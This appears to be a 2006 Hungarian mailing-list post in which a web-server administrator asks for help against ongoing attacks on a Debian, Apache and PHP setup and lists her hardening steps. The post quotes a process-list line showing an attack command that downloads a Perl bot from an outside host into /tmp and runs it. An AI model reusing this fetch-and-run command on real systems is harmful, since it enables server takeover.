Segitseg, tamadjak a webszerveremet
Kovács Marietta
margo35 at citromail.hu
2006. Okt. 4., Sze, 11:43:02 CEST
Sürgős segitség kellene. Két napja folyamatosan támadják a webszerveremet. Eddig még nem jöttek be, de kezd idegesíteni a dolog.
A konfig debian sarge + apache 1.3.33 + php 4 + mysql 4.1
A próbálkozásnak a ps-ben nyoma van:
www-data 2715 0.0 0.2 2476 1160 ? S 11:26 0:00 sh -c cd /tmp; wget http://cmgforum.net/botek.txt; mv botek.txt; .sessx; perl .sessx; rm botek.txt.*; wget ... stb.
Az apache error.log-ja is tele van a nyomaikkal.
Amit eddig csináltam:
/etc/passwd -ben a www-data user shell-je /bin/false
www-data user egyenlőre SEHOVA nem kapott írásjogot (még a /var/www-re sem)
/tmp jogait 700-ra állítottam
apache apt-get-tel frissítve (moodle-t agyonvágta, de egyenlőre fontosabb dolgom van)
tűzfalon elméletileg a 80,20,21,8080 portokonkívül minden zárva.
Valahogy mégis tudnak próbálkozni, de hogy? És ami még fontosabb, mit tudnék tenni ellene? Ha kell magánban tudok küldeni logokat, iptables scriptet stb.
_________________________________________
FIRST MINUTE SÍELÉSI AJÁNLATOKNézd át az adriatica.net fantasztikus síajánlatait és foglalj könnyen, gyorsan, olcsóbban - már most!
Részletekért klikk ide!
További információk a(z) Techinfo levelezőlistáról